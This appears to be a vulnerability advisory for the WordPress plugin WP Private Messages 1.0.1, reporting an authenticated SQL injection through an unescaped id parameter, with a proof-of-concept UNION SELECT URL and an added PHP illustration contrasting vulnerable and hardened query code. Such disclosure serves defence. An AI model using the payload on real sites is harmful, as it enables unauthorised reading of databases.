WP Private Messages 1.0.1 – Authenticated SQL Injection


Description
Type of user access: registered user.

$_GET['id'] is not escaped. The URL is accessible to every registered user.
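As an added illustration (the advisory does not reproduce the plugin's source, so this is a hypothetical reconstruction of the flaw class, not WP Private Messages' actual code), the unescaped-parameter pattern beside a hardened version that binds the value through $wpdb->prepare() and scopes the row to the current user; the table and column names are assumed.

```php
<?php
// Added example: hypothetical reconstruction of the defect described above,
// not the plugin's real source. Table and column names are assumed.

// VULNERABLE: the raw $_GET['id'] string is concatenated into the query, so a
// request value that is not a plain number can change the statement itself.
function wpu_read_message_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'wpu_private_messages'; // assumed table name
    $sql   = "SELECT * FROM {$table} WHERE id = " . $_GET['id'];
    return $wpdb->get_row( $sql );
}

// HARDENED:
//  1. require a logged-in user before touching the database;
//  2. coerce the parameter to a non-negative integer with absint();
//  3. bind it with a %d placeholder via $wpdb->prepare(), so nothing taken
//     from the request is ever interpreted as SQL;
//  4. restrict the row to the current user, so one registered user cannot
//     read another user's messages simply by supplying a different id.
function wpu_read_message_hardened() {
    global $wpdb;
    if ( ! is_user_logged_in() ) {
        return null;
    }
    $id      = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    $user_id = get_current_user_id();
    if ( 0 === $id ) {
        return null;
    }
    $table = $wpdb->prefix . 'wpu_private_messages'; // assumed table name
    $sql   = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE id = %d AND recipient_id = %d", // recipient_id assumed
        $id,
        $user_id
    );
    return $wpdb->get_row( $sql );
}
```

The ownership check in step 4 matters independently of the injection fix: even with a prepared statement, a numeric id that is not tied to the requesting user still allows reading other users' messages.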
Proof of Concept
http://www.example.com/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved

Note: use the ID number of your own user as the third column after the word SELECT. For example:

…UNION+SELECT+1,2,1,name,slug…

…UNION+SELECT+1,2,2,name,slug…

…UNION+SELECT+1,2,3,name,slug…

…UNION+SELECT+1,2,4,name,slug…

…UNION+SELECT+1,2,5,name,slug…

Affects

Plugin wp-private-messages

References

URL http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 91
Verified Yes
WPVDB ID 8701

Timeline

Publicly Published 2016-12-12
Added 2016-12-20
Last Updated 2016-12-20
